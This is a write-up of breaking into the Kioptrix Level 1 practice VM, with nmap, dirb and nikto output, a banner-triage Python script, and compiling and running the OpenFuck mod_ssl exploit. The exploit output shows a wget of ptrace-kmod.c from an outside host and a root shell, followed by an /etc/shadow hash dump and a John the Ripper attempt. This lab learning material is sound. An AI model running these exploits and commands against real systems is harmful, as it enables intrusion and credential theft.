[WriteUp] Kioptrix Level 1
Introduction
This is my revenge match from a while back.
I tried to break into Kioptrix on my own.
Tools used
netdiscover
nmap
nikto
dirb
searchsploit
Reconnaissance
% nmap -sV -sS -p 1-10000 -T5 192.168.3.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 02:52 EDT
Nmap scan report for 192.168.3.29
Host is up (0.0031s latency).
Not shown: 9994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:DB:CD:D6 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.73 seconds
Running services
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
% dirb http://192.168.3.29
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Mar 28 03:26:48 2020
URL_BASE: http://192.168.3.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.3.29/ ----
+ http://192.168.3.29/~operator (CODE:403|SIZE:273)
+ http://192.168.3.29/~root (CODE:403|SIZE:269)
+ http://192.168.3.29/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/
---- Entering directory: http://192.168.3.29/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.29/mrtg/ ----
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://192.168.3.29/usage/ ----
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
-----------------
END_TIME: Sat Mar 28 03:27:24 2020
DOWNLOADED: 13836 - FOUND: 6
Valid web directories and pages
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
% nikto -h 192.168.3.29
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.29
+ Target Hostname: 192.168.3.29
+ Target Port: 80
+ Start Time: 2020-03-28 02:56:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2020-03-28 02:56:39 (GMT-4) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Some vulnerabilities
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
and
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
→ These are only possibilities, so they need to be confirmed separately
Based on the information above, I will attempt the intrusion with the following plan:
1. Following the nmap results, check the following for vulnerabilities:
111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp status 1 (RPC #100024)
2. Following the dirb results, check the following for vulnerabilities:
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
3. Following the nikto results, check the following for vulnerabilities:
mod_ssl
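Before acting on banner-based findings like the ones above, it helps to check which reported versions actually fall inside the affected ranges that nikto itself states (mod_ssl 2.8.7 and lower for CVE-2002-0082, Apache 1.3 below 1.3.27 for CAN-2002-0839, below 1.3.29 for CAN-2003-0542). The following Python script is an added triage example, not part of the original writeup or of any of the tools used; the banner strings and version boundaries are taken from the scan output on this page, and everything else (function names, the CHECKS table layout) is my own construction.

```python
import re

# Service banners exactly as nmap reported them above (copied from the scan output).
BANNERS = [
    "22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)",
    "80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)",
    "443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
]

# Affected ranges as stated in the nikto findings above (constructed table).
# Each entry: (component, regex capturing the version, boundary, boundary inclusive?, reference)
CHECKS = [
    ("mod_ssl", r"mod_ssl/(\d+(?:\.\d+)+)", (2, 8, 7), True, "CVE-2002-0082"),
    ("apache", r"Apache(?:/| httpd )(\d+(?:\.\d+)+)", (1, 3, 27), False, "CAN-2002-0839"),
    ("apache", r"Apache(?:/| httpd )(\d+(?:\.\d+)+)", (1, 3, 29), False, "CAN-2003-0542"),
]

def parse_version(text):
    """'1.3.20' -> (1, 3, 20); numeric tuples compare correctly, unlike strings."""
    return tuple(int(part) for part in text.split("."))

def affected(version, bound, inclusive):
    """True if version lies inside the affected range that ends at bound."""
    width = max(len(version), len(bound))
    v = version + (0,) * (width - len(version))  # pad so 2.8 compares as 2.8.0
    b = bound + (0,) * (width - len(bound))
    return v <= b if inclusive else v < b

def triage(banner):
    """Return [(component, version, reference)] for every range the banner falls into."""
    hits = []
    for component, pattern, bound, inclusive, reference in CHECKS:
        match = re.search(pattern, banner)
        if match and affected(parse_version(match.group(1)), bound, inclusive):
            hits.append((component, match.group(1), reference))
    return hits

def report(banners):
    """Map 'port/proto' -> hits, dropping banners with nothing to follow up on."""
    out = {}
    for banner in banners:
        hits = triage(banner)
        if hits:
            out[banner.split()[0]] = hits
    return out

if __name__ == "__main__":
    for port, hits in report(BANNERS).items():
        for component, version, reference in hits:
            print(f"{port}: {component} {version} is in range for {reference}; confirm before relying on it")
```

A banner only tells you what the server claims to run; a backported fix or a rebuilt package can leave the version string unchanged, which is why the page's own note about confirming these findings still applies after this check.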
Intrusion
1. From the nmap results, I looked up vulnerabilities for the following with searchsploit
111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
1024/tcp status 1 (RPC #100024)
→ No useful results
443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
→ Found openfuck.c
2. From the dirb results, I checked the following URLs for vulnerabilities
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
→ Confirmed that Apache is running; no exploitable vulnerability found
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
→ Confirmed that the MRTG service is running; no exploitable vulnerability found
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
→ Confirmed that the Webalizer service is running; no exploitable vulnerability found
→ All NG
mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
Obtain OpenFuck and run the exploit
Running OpenFuck
Check the contents of the .c file to get the compilation instructions and other details
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
As described there, run the following commands
% apt-get install libssl-dev
% gcc -o OpenFuck OpenFuck.c -lcrypto
The argument specifies the target box; based on the Apache 1.3.20 and Red-Hat Linux reported by nmap,
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
these two are the candidate values for the argument
% ./OpenFuck 0x6a 192.168.3.29 443
→ NG
% ./OpenFuck 0x6b 192.168.3.29 443
→ OK
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ ./OpenFuck 0x6b 192.168.3.29 443
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--04:33:44-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.25 MB/s
04:33:45 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]
/usr/bin/ld: cannot open output file exploit: Permission denied
collect2: ld returned 1 exit status
gcc: file path prefix `/usr/bin' never used
whoami
root
Since I got root, there is no need for privilege escalation
Wait, is that it??
Exploration
Having gotten into the machine, I checked the /etc/shadow file
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::
Obtained the shadow entries of the 3 users including root and copied them locally
Crack the passwords with John the Ripper
For the wordlist I used rockyou.txt, which already ships with Kali
% john --wordlist=/usr/share/wordlist/rockyou.txt
→ The search isn't quite working...
That's all